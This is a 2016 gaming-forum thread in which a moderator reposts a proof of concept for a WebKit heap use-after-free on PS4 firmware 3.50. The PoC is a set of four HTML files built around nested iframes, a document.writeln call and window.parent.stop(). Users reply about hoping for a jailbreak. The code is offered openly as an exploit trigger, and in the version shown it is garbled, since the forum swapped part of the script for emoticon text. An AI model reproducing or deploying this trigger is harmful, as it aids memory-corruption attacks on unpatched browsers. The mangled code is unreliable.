Post: [RELEASE] heap use-after-free at WebCore - 3.50 Webkit Exploit POC by Hunter148
05-21-2016, 07:47 PM #1
Hydrogen
Super Mod
(adsbygoogle = window.adsbygoogle || []).push({}); That moment you're waiting for it to be released, but Red got it first Sal .. Credits to Hunter128 for releasing it publicly first, and credits to Red-EyeX32 for linking it on the ShoutBox. Here is the 3.50 Webkit PoC Release:

1.) Make an index.html

    <html>
<body onload='runTest()'>
<script>
function runTest(){
document.writeln('<html></html>'Winky Winky;
}
</script>
<iframe src='1.html'></iframe>
</body>
</html>


HTML #1
    <html>
<iframe src='2.html'></iframe>
<iframe src='3.html'></iframe>
</html>


HTML #2
    <html>
<script>
window.parent.stop();
</script>
</html>


HTML #3
    <html>
</html>


Cheers, Hydrogen Hi

Luv ya Red Sal


Source: Wololo; Releaser: Hunter148




Last edited by Hydrogen ; 05-22-2016 at 03:54 AM.

The following 6 users say thank you to Hydrogen for this useful post:

CodJumper:, DMAAR-7777, Kronoaxis, mishary-1212, Yolo Brahs !
05-25-2016, 06:23 AM #20
shawncarnage
Little One
I hope i still havve a 1.70
05-26-2016, 03:51 AM #21
Not Rage
Can’t trickshot me!
Originally posted by EyeX32 View Post
Expect two things late this month or in June Winky Winky


My birthday is in June :fa: JB would be a sick gift :cool:
05-26-2016, 04:53 AM #22
Dog88Christian
Hail to the King, Baby!
Originally posted by Not
My birthday is in June :fa: JB would be a sick gift :cool:


Well if we did I doubt it'd be for 3.50.
05-26-2016, 05:09 PM #23
Specter
Pro Memer
Originally posted by Hydrogen View Post
That moment you're waiting for it to be released, but Red got it first Sal .. Credits to Hunter128 for releasing it publicly first, and credits to Red-EyeX32 for linking it on the ShoutBox. Here is the 3.50 Webkit PoC Release:

1.) Make an index.html

    <html>
<body onload='runTest()'>
<script>
function runTest(){
document.writeln('<html></html>'Winky Winky;
}
</script>
<iframe src='1.html'></iframe>
</body>
</html>


HTML #1
    <html>
<iframe src='2.html'></iframe>
<iframe src='3.html'></iframe>
</html>


HTML #2
    <html>
<script>
window.parent.stop();
</script>
</html>


HTML #3
    <html>
</html>


Cheers, Hydrogen Hi

Luv ya Red Sal


Source: Wololo; Releaser: Hunter148






Cool thread but 99% of people who check this out probably won't know what to do with it lol.
05-26-2016, 05:14 PM #24
Hydrogen
Super Mod
Originally posted by F View Post
Cool thread but 99% of people who check this out probably won't know what to do with it lol.


Yeah I know Specter, and 99% of PS4 Developers already know before released in public lol. In addition, atleast individuals get updated on what's going on everyday in the scene. :p
05-27-2016, 03:47 AM #25
Not Rage
Can’t trickshot me!
Originally posted by Dog88Christian View Post
Well if we did I doubt it'd be for 3.50.


I know it would be for the 1.76 or lower, at least thats what most people are thinking at the moment
05-27-2016, 03:49 AM #26
Dog88Christian
Hail to the King, Baby!
Originally posted by Not
I know it would be for the 1.76 or lower, at least thats what most people are thinking at the moment


Which is exactly what I was saying, in other words.
05-27-2016, 12:00 PM #27
Yolo Brahs !
Are you high?
Great to see HUNTER128 is still modding Winky Winky
07-03-2016, 07:24 PM #28
This is confirmed working on 3.50?

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo